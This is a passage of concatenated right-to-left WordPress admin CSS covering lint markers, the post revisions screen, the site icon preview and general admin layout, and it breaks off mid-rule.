[class*=CodeMirror-lint-marker]{background-image:none}.wp-core-ui .CodeMirror-lint-marker-error,.wp-core-ui .CodeMirror-lint-marker-warning{cursor:help}.wrap .CodeMirror-lint-marker-multiple{position:absolute;top:0}.wrap [class*=CodeMirror-lint-marker]:before{font:normal 18px/1 dashicons;position:relative;top:-2px}.wp-core-ui [class*=CodeMirror-lint-message]:before{font:normal 16px/1 dashicons;right:16px;position:absolute}.wp-core-ui .CodeMirror-lint-message-error,.wp-core-ui .CodeMirror-lint-message-warning{box-shadow:0 1px 1px 0 rgba(0,0,0,.1);margin:5px 0 2px;padding:3px 28px 3px 12px}.wp-core-ui .CodeMirror-lint-message-warning{background-color:#fcf9e8;border-right:4px solid #dba617}.wp-core-ui .CodeMirror-lint-message-warning:before,.wrap .CodeMirror-lint-marker-warning:before{content:"\f534";color:#dba617}.wp-core-ui .CodeMirror-lint-message-error{background-color:#fcf0f1;border-right:4px solid #d63638}.wp-core-ui .CodeMirror-lint-message-error:before,.wrap .CodeMirror-lint-marker-error:before{content:"\f153";color:#d63638}.wp-core-ui .CodeMirror-lint-tooltip{background:0 0;border:none;border-radius:0;direction:rtl}.wrap .CodeMirror .CodeMirror-matchingbracket{background:rgba(219,166,23,.3);color:inherit}.CodeMirror{text-align:right}.wrap .CodeMirror .CodeMirror-linenumber{color:#646970}/*! This file is auto-generated */ /*------------------------------------------------------------------------------ 11.2 - Post Revisions ------------------------------------------------------------------------------*/ .revisions-control-frame, .revisions-diff-frame { position: relative; } .revisions-diff-frame { top: 10px; } .revisions-controls { padding-top: 40px; z-index: 1; } .revisions-controls input[type="checkbox"] { position: relative; top: -1px; vertical-align: text-bottom; } .revisions.pinned .revisions-controls { position: fixed; top: 0; height: 82px; background: #fff; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); } .revisions-tickmarks { position: relative; margin: 0 auto; height: 0.7em; top: 7px; max-width: 70%; box-sizing: border-box; background-color: #fff; } .revisions-tickmarks > div { position: absolute; height: 100%; border-right: 1px solid #a7aaad; box-sizing: border-box; } .revisions-tickmarks > div:first-child { border-width: 0; } .comparing-two-revisions .revisions-controls { height: 140px; } .comparing-two-revisions.pinned .revisions-controls { height: 124px; } .revisions .diff-error { position: absolute; text-align: center; margin: 0 auto; width: 100%; display: none; } .revisions.diff-error .diff-error { display: block; } .revisions .loading-indicator { position: absolute; vertical-align: middle; opacity: 0; width: 100%; width: calc( 100% - 30px ); top: 50%; top: calc( 50% - 10px ); transition: opacity 0.5s; } body.folded .revisions .loading-indicator { margin-right: -32px; } .revisions .loading-indicator span.spinner { display: block; margin: 0 auto; float: none; } .revisions.loading .loading-indicator { opacity: 1; } .revisions .diff { transition: opacity 0.5s; } .revisions.loading .diff { opacity: 0.5; } .revisions.diff-error .diff { visibility: hidden; } .revisions-meta { margin-top: 20px; background-color: #fff; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); overflow: hidden; } .revisions.pinned .revisions-meta { box-shadow: none; } .revision-toggle-compare-mode { position: absolute; top: 0; left: 0; } .comparing-two-revisions .revisions-previous, .comparing-two-revisions .revisions-next, .revisions-meta .diff-meta-to strong { display: none; } .revisions-controls .author-card .date { color: #646970; } .revisions-controls .author-card.autosave { color: #d63638; } .revisions-controls .author-card .author-name { font-weight: 600; } .comparing-two-revisions .diff-meta-to strong { display: block; } .revisions.pinned .revisions-buttons { padding: 0 11px; } .revisions-previous, .revisions-next { position: relative; z-index: 1; } .revisions-previous { float: right; } .revisions-next { float: left; } .revisions-controls .wp-slider { max-width: 70%; margin: 0 auto; top: -3px; } .revisions-diff { padding: 15px; background-color: #fff; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); } .revisions-diff h3:first-child { margin-top: 0; } /* Revision meta box */ .post-revisions li img, #revisions-meta-restored img { vertical-align: middle; } table.diff { table-layout: fixed; width: 100%; white-space: pre-wrap; } table.diff col.content { width: auto; } table.diff col.content.diffsplit { width: 48%; } table.diff col.diffsplit.middle { width: auto; } table.diff col.ltype { width: 30px; } table.diff tr { background-color: transparent; } table.diff td, table.diff th { font-family: Consolas, Monaco, monospace; font-size: 14px; line-height: 1.57142857; padding: 0.5em 2em 0.5em 0.5em; vertical-align: top; word-wrap: break-word; } table.diff td h1, table.diff td h2, table.diff td h3, table.diff td h4, table.diff td h5, table.diff td h6 { margin: 0; } table.diff .diff-deletedline del, table.diff .diff-addedline ins { text-decoration: none; } table.diff .diff-deletedline { position: relative; background-color: #fcf0f1; } table.diff .diff-deletedline del { background-color: #ffabaf; } table.diff .diff-addedline { position: relative; background-color: #edfaef; } table.diff .diff-deletedline .dashicons, table.diff .diff-addedline .dashicons { position: absolute; top: 0.85714286em; right: 0.5em; width: 1em; height: 1em; font-size: 1em; line-height: 1; } table.diff .diff-addedline .dashicons { /* Compensate the vertically non-centered plus glyph. */ top: 0.92857143em; } table.diff .diff-addedline ins { background-color: #68de7c; } .diff-meta { padding: 5px; clear: both; min-height: 32px; } .diff-title strong { line-height: 2.46153846; min-width: 60px; text-align: left; float: right; margin-left: 5px; } .revisions-controls .author-card .author-info { font-size: 12px; line-height: 1.33333333; } .revisions-controls .author-card .avatar, .revisions-controls .author-card .author-info { float: right; margin-right: 6px; margin-left: 6px; } .revisions-controls .author-card .byline { display: block; font-size: 12px; } .revisions-controls .author-card .avatar { vertical-align: middle; } .diff-meta input.restore-revision { float: left; margin-right: 6px; margin-left: 6px; } .diff-meta-from { display: none; } .comparing-two-revisions .diff-meta-from { display: block; } .revisions-tooltip { position: absolute; bottom: 105px; margin-left: 0; margin-right: -69px; z-index: 0; max-width: 350px; min-width: 130px; padding: 8px 4px; display: none; opacity: 0; } .revisions-tooltip.flipped { margin-right: 0; margin-left: -70px; } .revisions.pinned .revisions-tooltip { display: none !important; } .comparing-two-revisions .revisions-tooltip { bottom: 145px; } .revisions-tooltip-arrow { width: 70px; height: 15px; overflow: hidden; position: absolute; right: 0; margin-right: 35px; bottom: -15px; } .revisions-tooltip.flipped .revisions-tooltip-arrow { margin-right: 0; margin-left: 35px; right: auto; left: 0; } .revisions-tooltip-arrow > span { content: ""; position: absolute; right: 20px; top: -20px; width: 25px; height: 25px; transform: rotate(-45deg); } .revisions-tooltip.flipped .revisions-tooltip-arrow > span { right: auto; left: 20px; } .revisions-tooltip, .revisions-tooltip-arrow > span { border: 1px solid #dcdcde; background-color: #fff; } .revisions-tooltip { display: none; } .arrow { width: 70px; height: 16px; overflow: hidden; position: absolute; right: 0; margin-right: -35px; bottom: 90px; z-index: 10000; } .arrow:after { z-index: 9999; background-color: #fff; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); } .arrow.top { top: -16px; bottom: auto; } .arrow.left { right: 20%; } .arrow:after { content: ""; position: absolute; right: 20px; top: -20px; width: 25px; height: 25px; transform: rotate(-45deg); } .revisions-tooltip, .revisions-tooltip-arrow:after { border-width: 1px; border-style: solid; } div.revisions-controls > .wp-slider > .ui-slider-handle { margin-right: -10px; } .rtl div.revisions-controls > .wp-slider > .ui-slider-handle { margin-left: -10px; } /* jQuery UI Slider */ .wp-slider.ui-slider { position: relative; border: 1px solid #dcdcde; text-align: right; cursor: pointer; } .wp-slider .ui-slider-handle { border-radius: 50%; height: 18px; margin-top: -5px; outline: none; padding: 2px; position: absolute; width: 18px; z-index: 2; touch-action: none; } .wp-slider .ui-slider-handle { background: #f6f7f7; border: 1px solid #c3c4c7; box-shadow: 0 1px 0 #c3c4c7; } .wp-slider .ui-slider-handle:hover, .wp-slider .ui-slider-handle.ui-state-hover { background: #f6f7f7; border-color: #8c8f94; } .wp-slider .ui-slider-handle:active, .wp-slider .ui-slider-handle.ui-state-active { background: #f0f0f1; border-color: #8c8f94; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5); transform: translateY(1px); } .wp-slider .ui-slider-handle:focus, .wp-slider .ui-slider-handle.ui-state-focus { background: #f0f0f1; border-color: #8c8f94; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-slider .ui-slider-handle:before { background: none; position: absolute; top: 2px; right: 2px; color: #50575e; content: "\f229"; content: "\f229" / ''; font: normal 18px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .wp-slider .ui-slider-handle:hover:before, .wp-slider .ui-slider-handle.ui-state-hover:before { color: #1d2327; } .wp-slider .ui-slider-handle.from-handle:before, .wp-slider .ui-slider-handle.to-handle:before { font-size: 20px !important; margin: -1px -1px 0 0; } .wp-slider .ui-slider-handle.from-handle:before { content: "\f141"; content: "\f139" / ''; } .wp-slider .ui-slider-handle.to-handle:before { content: "\f139"; content: "\f141" / ''; } .rtl .wp-slider .ui-slider-handle.from-handle:before { content: "\f139"; content: "\f141" / ''; } .rtl .wp-slider .ui-slider-handle.to-handle:before { content: "\f141"; content: "\f139" / ''; left: -1px; } .wp-slider .ui-slider-range { position: absolute; font-size: 0.7em; display: block; border: 0; background-color: transparent; background-image: none; } .wp-slider.ui-slider-horizontal { height: 0.7em; } .wp-slider.ui-slider-horizontal .ui-slider-handle { top: -.25em; margin-right: -.6em; } .wp-slider.ui-slider-horizontal .ui-slider-range { top: 0; height: 100%; } .wp-slider.ui-slider-horizontal .ui-slider-range-min { right: 0; } .wp-slider.ui-slider-horizontal .ui-slider-range-max { left: 0; } /* =Media Queries -------------------------------------------------------------- */ /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { .revision-tick.completed-false { background-image: url(../images/spinner-2x.gif); } } @media screen and (max-width: 600px) { .revisions-meta .author-card:not(.comparing-two-revisions .author-card) { display: flex; flex-direction: column; width: fit-content; gap: 16px; } .comparing-two-revisions .revisions-meta .restore-revision { margin-top: 16px; } .revisions-controls { padding-top: 0; } .revision-toggle-compare-mode { position: relative; padding: 1rem 0; } } @media screen and (max-width: 782px) { #diff-next-revision, #diff-previous-revision { margin-top: -1em; } .revisions-buttons { overflow: hidden; margin-bottom: 15px; } .revisions-controls, .comparing-two-revisions .revisions-controls { height: fit-content; } .revisions-tooltip { bottom: 155px; z-index: 2; } .comparing-two-revisions .revisions-tooltip { bottom: 200px; } .diff-meta { overflow: hidden; } table.diff { -ms-word-break: break-all; word-break: break-all; word-wrap: break-word; } } /*------------------------------------------------------------------------------ 28.0 - Site Icon ------------------------------------------------------------------------------*/ .site-icon-section { --site-icon-removal: #b32d2e; } .site-icon-preview { --site-icon-input-border: #8c8f94; --site-icon-preview-background: #fff; --site-icon-preview-browser-top: #dcdcde; --site-icon-preview-browser-bottom: #a7aaad; --site-icon-preview-browser-border: rgba(255, 255, 255, 0.2); --site-icon-address-bar-background: #f0f0f1; --site-icon-address-bar-close: #646970; --site-icon-address-bar-text: #3c434a; --site-icon-shadow-1: rgba(0, 0, 0, 0.1); --site-icon-shadow-2: rgba(0, 0, 0, 0.2); --site-icon-shadow-3: rgba(0, 0, 0, 0.5); direction: initial; display: flex; height: 60px; padding: 8px 0 0 8px; align-items: flex-start; position: relative; overflow: hidden; box-sizing: border-box; border: 1px solid var(--site-icon-input-border); border-radius: 4px; background-color: var(--site-icon-preview-background); width: 275px; } @media (prefers-color-scheme: dark) { .site-icon-preview { --site-icon-preview-browser-top: #2c3338; --site-icon-preview-browser-bottom: #111; --site-icon-address-bar-background: #3c434a; --site-icon-address-bar-close: #f0f0f1; --site-icon-address-bar-text: #f0f0f1; } } .site-icon-preview.settings { height: 88px; padding: 16px 0 0 16px; width: 350px; margin: 0 0 16px 0; } .site-icon-preview.crop { width: 258px; height: 100%; display: grid; grid-template-columns: 8px 1fr; grid-template-rows: 64px 1fr; padding-left: 0; row-gap: 16px; direction: inherit; } .site-icon-preview.hidden { display: none; } .site-icon-preview .direction-wrap { grid-template-columns: 44px 1fr; gap: 8px; display: grid; direction: ltr; height: 100%; width: 100%; } .site-icon-preview.settings .direction-wrap { grid-template-columns: 58px 1fr; gap: 16px; } .site-icon-preview:after { --after-size: 150%; aspect-ratio: 1/1; content: ""; display: block; position: absolute; top: 0; left: 0; width: var(--after-size);; transform: translate(calc(var(--after-size) * -0.125), calc(var(--after-size) * -0.125)); filter: blur(5px); opacity: 0.5; background: var(--site-icon-url); } .site-icon-preview .app-icon-preview { aspect-ratio: 1/1; border-radius: 10px; box-shadow: 0 1px 5px 0 var(--site-icon-shadow-3); flex-shrink: 0; width: 100%; z-index: 1; } .site-icon-preview-browser { display: flex; padding: 4px 4px 0 12px; align-items: flex-start; gap: 16px; flex: 1 0 0; z-index: 1; border-top-left-radius: 10px; border-top: 1px solid var(--site-icon-preview-browser-border); border-left: 1px solid var(--site-icon-preview-browser-border); background: linear-gradient(180deg, var(--site-icon-preview-browser-top) 0%, var(--site-icon-preview-browser-bottom) 100%); box-shadow: 0 10px 22px 0 var(--site-icon-shadow-2); } .site-icon-preview .browser-buttons { width: 48px; height: 40px; fill: var(--site-icon-input-border); } .site-icon-preview-tab { padding: 8px; align-items: center; gap: 8px; flex: 1 0 0; border-radius: 4px; background-color: var(--site-icon-address-bar-background); box-shadow: 0 1px 3px 0 var(--site-icon-shadow-1); display: grid; grid-template-columns: 24px auto 24px; } .site-icon-preview-browser .browser-icon-preview { box-shadow: 0 0 20px 0 var(--site-icon-shadow-1); } .site-icon-preview-tab > img, .site-icon-preview-tab > svg { width: 24px; height: 24px; } .site-icon-preview-tab > svg { fill: var(--site-icon-address-bar-close); } .site-icon-preview-site-title { color: var(--site-icon-address-bar-text); text-overflow: ellipsis; white-space: nowrap; overflow: hidden; font-weight: 500; } .site-icon-preview-crop-modal .image-preview-wrap.app-icon-preview { width: 64px; height: 64px; margin: 0; grid-column: 2; } .site-icon-preview-crop-modal .site-icon-preview-browser { grid-column: 2; } .site-icon-preview-crop-modal .image-preview-wrap { overflow: hidden; aspect-ratio: 1/1; } .site-icon-preview-crop-modal .image-preview-wrap.browser { width: 24px; height: 24px; } button.reset.remove-site-icon { color: var(--site-icon-removal); text-decoration: none; border-color: currentColor; box-shadow: none; background: transparent; } button.reset.remove-site-icon:focus, button.reset.remove-site-icon:hover { background: var(--site-icon-removal); color: #fff; border-color: var(--site-icon-removal); box-shadow: 0 0 0 1px var(--site-icon-removal); } .site-icon-action-buttons { display: flex; flex-wrap: wrap; gap: 10px; } /*! This file is auto-generated */ #wpwrap{height:auto;min-height:100%;width:100%;position:relative;-webkit-font-smoothing:subpixel-antialiased}#wpcontent{height:100%;padding-right:20px}#wpcontent,#wpfooter{margin-right:160px}.folded #wpcontent,.folded #wpfooter{margin-right:36px}#wpbody-content{padding-bottom:65px;float:right;width:100%;overflow:visible}.inner-sidebar{float:left;clear:left;display:none;width:281px;position:relative}.columns-2 .inner-sidebar{margin-left:auto;width:286px;display:block}.columns-2 .inner-sidebar #side-sortables,.inner-sidebar #side-sortables{min-height:300px;width:280px;padding:0}.has-right-sidebar .inner-sidebar{display:block}.has-right-sidebar #post-body{float:right;clear:right;width:100%;margin-left:-2000px}.has-right-sidebar #post-body-content{margin-left:300px;float:none;width:auto}#col-left{float:right;width:35%}#col-right{float:left;width:65%}#col-left .col-wrap{padding:0 0 0 6px}#col-right .col-wrap{padding:0 6px 0 0}.alignleft{float:right}.alignright{float:left}.textleft{text-align:right}.textright{text-align:left}.clear{clear:both}.wp-clearfix:after{content:"";display:table;clear:both}.screen-reader-text,.screen-reader-text span,.ui-helper-hidden-accessible{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important;word-break:normal!important}.button .screen-reader-text{height:auto}.screen-reader-text+.dashicons-external{margin-top:-1px;margin-right:2px;text-decoration:none}.screen-reader-shortcut{position:absolute;top:-1000em;right:6px;height:auto;width:auto;display:block;font-size:14px;font-weight:600;padding:15px 23px 14px;background:#fff;color:var(--wp-admin-theme-color,#3858e9);z-index:100000;line-height:normal}.screen-reader-shortcut:focus{top:-25px;color:var(--wp-admin-theme-color,#3858e9);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);text-decoration:none;outline:2px solid transparent;outline-offset:-2px}.hidden,.js .closed .inside,.js .hide-if-js,.js .wp-core-ui .hide-if-js,.js.wp-core-ui .hide-if-js,.no-js .hide-if-no-js,.no-js .wp-core-ui .hide-if-no-js,.no-js.wp-core-ui .hide-if-no-js{display:none}#menu-management .menu-edit,#menu-settings-column .accordion-container,.comment-ays,.feature-filter,.manage-menus,.menu-item-handle,.popular-tags,.stuffbox,.widget-inside,.widget-top,.widgets-holder-wrap,.wp-editor-container,p.popular-tags,table.widefat{border:1px solid #c3c4c7;box-shadow:0 1px 1px rgba(0,0,0,.04)}.comment-ays,.feature-filter,.popular-tags,.stuffbox,.widgets-holder-wrap,.wp-editor-container,p.popular-tags,table.widefat{background:#fff}body,html{height:100%;margin:0;padding:0}body{background:#f0f0f1;color:#3c434a;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;font-size:13px;line-height:1.4em;min-width:600px}body.iframe{min-width:0;padding-top:1px}body.modal-open{overflow:hidden}body.mobile.modal-open #wpwrap{overflow:hidden;position:fixed;height:100%}iframe,img{border:0}td{font-family:inherit;font-size:inherit;font-weight:inherit;line-height:inherit}a{color:#2271b1;transition-property:border,background,color;transition-duration:.05s;transition-timing-function:ease-in-out}a,div{outline:0}a:active,a:hover{color:#135e96}.wp-person a:focus .gravatar,a:focus,a:focus .media-icon img,a:focus .plugin-icon{color:#043959;border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#adminmenu a:focus{box-shadow:none;outline:1px solid transparent;outline-offset:-1px}.screen-reader-text:focus{box-shadow:none;outline:0}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}.wp-die-message,p{font-size:13px;line-height:1.5;margin:1em 0}blockquote{margin:1em}dd,li{margin-bottom:6px}h1,h2,h3,h4,h5,h6{display:block;font-weight:600}h1{color:#1d2327;font-size:2em;margin:.67em 0}h2,h3{color:#1d2327;font-size:1.3em;margin:1em 0}.update-core-php h2{margin-top:4em}.update-messages h2,.update-php h2,h4{font-size:1em;margin:1.33em 0}h5{font-size:.83em;margin:1.67em 0}h6{font-size:.67em;margin:2.33em 0}ol,ul{padding:0}ul{list-style:none}ol{list-style-type:decimal;margin-right:2em}ul.ul-disc{list-style:disc outside}ul.ul-square{list-style:square outside}ol.ol-decimal{list-style:decimal outside}ol.ol-decimal,ul.ul-disc,ul.ul-square{margin-right:1.8em}ol.ol-decimal>li,ul.ul-disc>li,ul.ul-square>li{margin:0 0 .5em}.ltr{direction:ltr}.code,code{font-family:Consolas,Monaco,monospace;direction:ltr;unicode-bidi:embed}code,kbd{padding:3px 5px 2px;margin:0 1px;background:#f0f0f1;background:rgba(0,0,0,.07);font-size:13px}.subsubsub{list-style:none;margin:8px 0 0;padding:0;font-size:13px;float:right;color:#646970}.subsubsub a{line-height:2;padding:.2em;text-decoration:none}.subsubsub a .count,.subsubsub a.current .count{color:#50575e;font-weight:400}.subsubsub a.current{font-weight:600;border:none}.subsubsub li{display:inline-block;margin:0;padding:0;white-space:nowrap}.widefat{border-spacing:0;width:100%;clear:both;margin:0}.widefat *{word-wrap:break-word}.widefat a,.widefat button.button-link{text-decoration:none}.widefat td,.widefat th{padding:8px 10px}.widefat thead td,.widefat thead th{border-bottom:1px solid #c3c4c7}.widefat tfoot td,.widefat tfoot th{border-top:1px solid #c3c4c7;border-bottom:none}.widefat .no-items td{border-bottom-width:0}.widefat td{vertical-align:top}.widefat td,.widefat td ol,.widefat td p,.widefat td ul{font-size:13px;line-height:1.5em}.widefat tfoot td,.widefat th,.widefat thead td{text-align:right;line-height:1.3em;font-size:14px}.updates-table td input,.widefat tfoot td input,.widefat th input,.widefat thead td input{margin:0 8px 0 0;padding:0;vertical-align:text-top}.widefat .check-column{width:2.2em;padding:6px 0 25px;vertical-align:top}.widefat tbody th.check-column{padding:9px 0 22px}.updates-table tbody td.check-column,.widefat tbody th.check-column,.widefat tfoot td.check-column,.widefat thead td.check-column{padding:11px 3px 0 0}.widefat tfoot td.check-column,.widefat thead td.check-column{padding-top:4px;vertical-align:middle}.update-php div.error,.update-php div.updated{margin-right:0}.js-update-details-toggle .dashicons{text-decoration:none}.js-update-details-toggle[aria-expanded=true] .dashicons::before{content:"\f142";content:"\f142"/''}.no-js .widefat tfoot .check-column input,.no-js .widefat thead .check-column input{display:none}.column-comments,.column-links,.column-posts,.widefat .num{text-align:center}.widefat th#comments{vertical-align:middle}.wrap{margin:10px 2px 0 20px}.postbox .inside h2,.wrap [class$=icon32]+h2,.wrap h1,.wrap>h2:first-child{font-size:23px;font-weight:400;margin:0;padding:9px 0 4px;line-height:1.3}.wrap h1.wp-heading-inline{display:inline-block;margin-left:5px}.wp-header-end{visibility:hidden;margin:-2px 0 0}.subtitle{margin:0;padding-right:25px;color:#50575e;font-size:14px;font-weight:400;line-height:1}.subtitle strong{word-break:break-all}.wrap .add-new-h2,.wrap .add-new-h2:active,.wrap .page-title-action,.wrap .page-title-action:active{display:inline-block;position:relative;box-sizing:border-box;cursor:pointer;white-space:nowrap;text-decoration:none;text-shadow:none;top:-3px;margin-right:4px;border:1px solid #2271b1;border-radius:2px;background:0 0;font-size:13px;font-weight:500;min-height:32px;line-height:2.30769231;color:#2271b1;padding:0 12px;-webkit-appearance:none}.wrap .wp-heading-inline+.page-title-action{margin-right:0}.wrap .add-new-h2:hover,.wrap .page-title-action:hover{border-color:#0a4b78;color:#0a4b78}.page-title-action:focus{color:#0a4b78}.form-table th label[for=WPLANG] .dashicons,.form-table th label[for=locale] .dashicons{margin-right:5px}.wrap .page-title-action:focus{border-color:#3582c4;box-shadow:0 0 0 1px #3582c4;outline:2px solid transparent}.wrap h1.long-header{padding-left:0}.wp-dialog{background-color:#fff}#available-widgets .widget-top:hover,#widgets-left .widget-in-question .widget-top,#widgets-left .widget-top:hover,.widgets-chooser ul,div#widgets-right .widget-top:hover{border-color:#8c8f94;box-shadow:0 1px 2px rgba(0,0,0,.1)}.sorthelper{background-color:#c5d9ed}.ac_match,.subsubsub a.current{color:#000}.alternate,.striped>tbody>:nth-child(odd),ul.striped>:nth-child(odd){background-color:#f6f7f7}.bar{background-color:#f0f0f1;border-left-color:var(--wp-admin-theme-color)}.highlight{background-color:rgba(var(--wp-admin-theme-color--rgb),.08);color:#3c434a}.wp-ui-primary{color:#fff;background-color:#2c3338}.wp-ui-text-primary{color:#2c3338}.wp-ui-highlight{color:#fff;background-color:#2271b1}.wp-ui-text-highlight{color:#2271b1}.wp-ui-notification{color:#fff;background-color:#d63638}.wp-ui-text-notification{color:#d63638}.wp-ui-text-icon{color:#8c8f94}img.emoji{display:inline!important;border:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-.1em!important;background:0 0!important;padding:0!important;box-shadow:none!important}#nav-menu-footer,#nav-menu-header,#your-profile #rich_editing,.checkbox,.control-section .accordion-section-title,.menu-item-handle,.postbox .hndle,.side-info,.sidebar-name,.stuffbox .hndle,.widefat tfoot td,.widefat tfoot th,.widefat thead td,.widefat thead th,.widget .widget-top{line-height:1.4em}.menu-item-handle,.widget .widget-top{background:#f6f7f7;color:#1d2327}.stuffbox .hndle{border-bottom:1px solid #c3c4c7}.quicktags{background-color:#c3c4c7;color:#000;font-size:12px}.icon32{display:none}#bulk-titles .ntdelbutton:before,.notice-dismiss:before,.tagchecklist .ntdelbutton .remove-tag-icon:before,.welcome-panel .welcome-panel-close:before{background:0 0;color:#1e1e1e;content:"\f335";content:"\f335"/'';display:block;font:normal 20px/1 dashicons;height:1em;text-align:center;width:1em;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.welcome-panel .welcome-panel-close:before{margin:0}.tagchecklist .ntdelbutton .remove-tag-icon:before{margin-right:2px;border-radius:50%;color:var(--wp-admin-theme-color,#3858e9);line-height:1.1}.tagchecklist .ntdelbutton:focus{outline:0}#bulk-titles .ntdelbutton:focus:before,#bulk-titles .ntdelbutton:hover:before,.tagchecklist .ntdelbutton:focus .remove-tag-icon:before,.tagchecklist .ntdelbutton:hover .remove-tag-icon:before{color:#d63638}.tagchecklist .ntdelbutton:focus .remove-tag-icon:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.key-labels label{line-height:24px}b,strong{font-weight:600}.pre{white-space:pre-wrap;word-wrap:break-word}.howto{color:#646970;display:block}p.install-help{margin:8px 0;font-style:italic}.no-break{white-space:nowrap}hr{border:0;border-top:1px solid #dcdcde;border-bottom:1px solid #f6f7f7}#all-plugins-table .plugins a.delete,#delete-link a.delete,#media-items a.delete,#media-items a.delete-permanently,#nav-menu-footer .menu-delete,#search-plugins-table .plugins a.delete,.plugins a.delete,.privacy_requests .remove-personal-data .remove-personal-data-handle,.row-actions span.delete a,.row-actions span.spam a,.row-actions span.trash a,.submitbox .submitdelete,a#remove-post-thumbnail{color:#b32d2e}#all-plugins-table .plugins a.delete:hover,#delete-link a.delete:hover,#media-items a.delete-permanently:hover,#media-items a.delete:hover,#nav-menu-footer .menu-delete:hover,#search-plugins-table .plugins a.delete:hover,.file-error,.plugins a.delete:hover,.privacy_requests .remove-personal-data .remove-personal-data-handle:hover,.row-actions .delete a:hover,.row-actions .spam a:hover,.row-actions .trash a:hover,.submitbox .submitdelete:hover,a#remove-post-thumbnail:hover,abbr.required,span.required{color:#b32d2e;border:none}.application-password-display .success{color:#007017;margin-right:.5rem}#major-publishing-actions{padding:10px;clear:both;border-top:1px solid #dcdcde;background:#f6f7f7;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between}#delete-action{line-height:2.30769231}#delete-link a{text-decoration:none}#publishing-action{text-align:left;margin-right:auto;line-height:1.9}#publishing-action .spinner{float:none}#misc-publishing-actions{padding:6px 0 0}.misc-pub-section{padding:6px 10px 8px}.misc-pub-filename,.word-wrap-break-word{word-wrap:break-word}#minor-publishing-actions{padding:10px 10px 0;text-align:left}#save-post{float:right}.preview{float:left}#sticky-span{margin-right:18px}.approve,.unapproved .unapprove{display:none}.spam .approve,.trash .approve,.unapproved .approve{display:inline}td.action-links,th.action-links{text-align:left}#misc-publishing-actions .notice{margin-right:10px;margin-left:10px}.wp-filter{display:inline-block;position:relative;box-sizing:border-box;margin:12px 0 25px;padding:0 10px;width:100%;box-shadow:0 1px 1px rgba(0,0,0,.04);border:1px solid #c3c4c7;background:#fff;color:#50575e;font-size:13px}.wp-filter a{text-decoration:none}.filter-count{display:inline-block;vertical-align:middle;min-width:4em}.filter-count .count,.title-count{display:inline-block;position:relative;top:-1px;padding:4px 10px;border-radius:30px;background:#646970;color:#fff;font-size:14px;font-weight:600}.title-count{display:inline;top:-3px;margin-right:5px;margin-left:20px}.filter-items{float:right}.filter-links{display:inline-block;margin:0}.filter-links li{display:inline-block;margin:0}.filter-links li>a{display:inline-block;margin:0 10px;padding:15px 0;border-bottom:4px solid #fff;color:#646970;cursor:pointer}.filter-links .current{box-shadow:none;border-bottom:4px solid var(--wp-admin-theme-color);color:#1d2327}.filter-links li>a:focus,.filter-links li>a:hover,.show-filters .filter-links a.current:focus,.show-filters .filter-links a.current:hover{color:var(--wp-admin-theme-color)}.wp-filter .search-form{float:left;display:flex;align-items:center;column-gap:.5rem}.wp-filter .search-form input[type=search]{width:280px;max-width:100%}.wp-filter .search-form select{margin:0}.wp-filter .search-form input[type=search]{min-height:32px;padding:0 8px}.wp-filter .filter-items select,.wp-filter .search-form select{min-height:32px;line-height:2.14285714;padding:0 8px 0 24px}.wp-filter .button{min-height:32px;line-height:2.30769231;padding:0 12px}.plugin-install-php .wp-filter,.upload-php .wp-filter{display:flex;flex-wrap:wrap;justify-content:space-between;align-items:center}.no-js .wp-filter .search-form.search-plugins .button,.wp-filter .search-form.search-plugins .wp-filter-search,.wp-filter .search-form.search-plugins select{display:inline-block;vertical-align:top}.wp-filter .button.drawer-toggle{margin:10px 9px 0;padding:0 6px 0 10px;border-color:transparent;background-color:transparent;color:#646970;vertical-align:baseline;box-shadow:none}.wp-filter .drawer-toggle:before{content:"\f111";content:"\f111"/'';margin:0 0 0 5px;color:#646970;font:normal 16px/1 dashicons;vertical-align:text-bottom;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.wp-filter .button.drawer-toggle:focus,.wp-filter .button.drawer-toggle:hover,.wp-filter .drawer-toggle:focus:before,.wp-filter .drawer-toggle:hover:before{background-color:transparent;color:var(--wp-admin-theme-color)}.wp-filter .button.drawer-toggle:focus:active,.wp-filter .button.drawer-toggle:hover{border-color:transparent}.wp-filter .button.drawer-toggle:focus{border-color:var(--wp-admin-theme-color)}.wp-filter .button.drawer-toggle:active{background:0 0;box-shadow:none;transform:none}.wp-filter .drawer-toggle.current:before{color:#fff}.filter-drawer,.wp-filter .favorites-form{display:none;margin:0 -20px 0 -10px;padding:20px;border-top:1px solid #f0f0f1;background:#f6f7f7;overflow:hidden}.wp-filter .favorites-form .favorites-username{display:flex;align-items:center;flex-wrap:wrap;gap:.5rem}.wp-filter .favorites-form .favorites-username input{margin:0}.show-favorites-form .favorites-form,.show-filters .filter-drawer{display:block}.show-filters .filter-links a.current{border-bottom:none}.show-filters .wp-filter .button.drawer-toggle{border-radius:2px;background:#646970;color:#fff}.show-filters .wp-filter .drawer-toggle:focus,.show-filters .wp-filter .drawer-toggle:hover{background:var(--wp-admin-theme-color)}.show-filters .wp-filter .drawer-toggle:before{color:#fff}.filter-group{box-sizing:border-box;position:relative;float:right;margin:0 0 